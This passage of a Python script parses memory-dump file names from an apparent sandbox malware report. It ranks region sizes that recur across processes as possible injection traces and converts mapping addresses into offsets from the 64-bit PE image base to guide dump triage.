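    r"(?:-0x(?P<end>[0-9A-Fa-f]+)-memory|-mapping)\.dmp")

def parse_dump(name):
    """Split a dump file name into pid, index, start, end, size and kind;
    None for names that do not follow the report's scheme."""
    m = DUMP_RE.fullmatch(name)
    if not m:
        return None
    start = int(m["start"], 16)
    end = int(m["end"], 16) if m["end"] else None
    return {"pid": int(m["pid"]), "n": int(m["n"]), "start": start, "end": end,
            "size": None if end is None else end - start,
            "kind": "mapping" if end is None else "memory"}

def widespread_regions(names, min_pids=3):
    """Region sizes present in at least min_pids distinct processes, most
    widespread first.  One size showing up in many unrelated PIDs is the
    shape that injection into every reachable process leaves in a dump
    listing; the size alone does not prove it."""
    by_size = defaultdict(set)
    for d in filter(None, map(parse_dump, names)):
        if d["kind"] == "memory":
            by_size[d["size"]].add(d["pid"])
    hits = [(size, sorted(pids)) for size, pids in by_size.items()
            if len(pids) >= min_pids]
    return sorted(hits, key=lambda t: (-len(t[1]), t[0]))

def mapping_offsets(names):
    """For each mapping dump, the memory region of the same PID that contains
    its address, and the offset into it.  0x140000000 is the default image
    base of 64-bit PE files, so an offset into a region starting there reads
    as an RVA into an image mapped at that base.  Mapping dumps at address
    0x0 match no region and are dropped."""
    dumps = list(filter(None, map(parse_dump, names)))
    regions = [d for d in dumps if d["kind"] == "memory"]
    out = set()
    for m in (d for d in dumps if d["kind"] == "mapping"):
        for r in regions:
            if r["pid"] == m["pid"] and r["start"] <= m["start"] < r["end"]:
                out.add((m["pid"], r["start"], m["start"] - r["start"]))
                break
    return sorted(out)

# Subset of the report's dump names (copied, not invented).
SAMPLE_NAMES = [
    "memory/416-156-0x0000000000860000-0x000000000088A000-memory.dmp",
    "memory/416-149-0x0000000037850000-0x0000000037860000-memory.dmp",
    "memory/460-163-0x0000000000210000-0x000000000023A000-memory.dmp",
    "memory/460-155-0x0000000037850000-0x0000000037860000-memory.dmp",
    "memory/476-304-0x0000000000170000-0x000000000019A000-memory.dmp",
    "memory/476-160-0x0000000037850000-0x0000000037860000-memory.dmp",
    "memory/484-168-0x00000000003B0000-0x00000000003DA000-memory.dmp",
    "memory/572-101-0x0000000140000000-0x0000000140056000-memory.dmp",
    "memory/572-108-0x0000000140001844-mapping.dmp",
    "memory/1076-135-0x0000000140000000-0x0000000140042000-memory.dmp",
    "memory/1076-136-0x00000001400033F4-mapping.dmp",
    "memory/1352-54-0x0000000001030000-0x00000000019B4000-memory.dmp",
    "memory/108-421-0x0000000000000000-mapping.dmp",
]

if __name__ == "__main__":
    for size, pids in widespread_regions(SAMPLE_NAMES):
        print(f"{size // 1024}KB region in {len(pids)} PIDs: {pids}")
    for pid, base, off in mapping_offsets(SAMPLE_NAMES):
        print(f"PID {pid}: mapping dump at 0x{base:X} + 0x{off:X}")
```

Run against the full listing, the first loop ranks the 168KB and 64KB regions at the top, which gives the order in which to open the dumps; the second loop turns the two `-mapping.dmp` addresses into RVAs that can be looked up directly in whatever image is found at 0x140000000 in PIDs 572 and 1076.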